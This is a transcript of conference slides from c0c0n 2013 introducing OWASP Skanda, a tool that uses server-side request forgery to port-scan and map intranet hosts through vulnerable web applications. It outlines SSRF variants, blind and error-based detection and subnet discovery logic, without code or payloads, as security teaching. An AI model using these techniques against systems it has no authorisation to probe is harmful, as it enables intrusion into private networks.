c0c0n 2013 - owasp skanda
DESCRIPTION
Infiltrating the intranet using SkandaTRANSCRIPT
HELLO
SKANDAJayesh Singh Chauhan
@jayeshsch
ABOUT ME
• Author/Project Leader – OWASP Skanda
• Author of CSRF PoC Generator
• Pen Tester, Coder, B33rHead
• Snooker (Crazy Fan !!!)
Port Scan
• Nmap ???
• Firewall/IDS
• NO GAIN
SSRF
• Web Apps
• Scan/Attack
• Enumerate/Attack Services
SSRF
• A class of attack
• XXE, RFI, CRLF Injections
• If opens socket, can be SSRFed
Normal Attack
SSRF Attack
What makes it possible
• HTTP Client -> No Protocol Check
• Invalid packets ->Service doesn’t close
• Protocol that you can forge fit with the protocols .
Let’s dive into Skanda
• Port Scan
• Network Discovery
XSPA/SSRF
• Error based XSPA
• Blind XSPA
• Closed Port
DEMO
• Port Scanning using Skanda
Intranet
Intranet Discovery
• Router -> First IP
• Checks whether any router is up
• If(IP==found):enter subnet
• Analyze every node’s response
DEMO
• Network Discovery using Skanda
Q & A ?
Got ‘em ? Ask ‘em ?
Special Thanks to..
• Lavakumar Kuppan, @lavakumark
• Riyaz Walikar, @riyazwalikar
• Ajith Chandran, @r3dsm0k3
• ONsec Lab, @Onsec_lab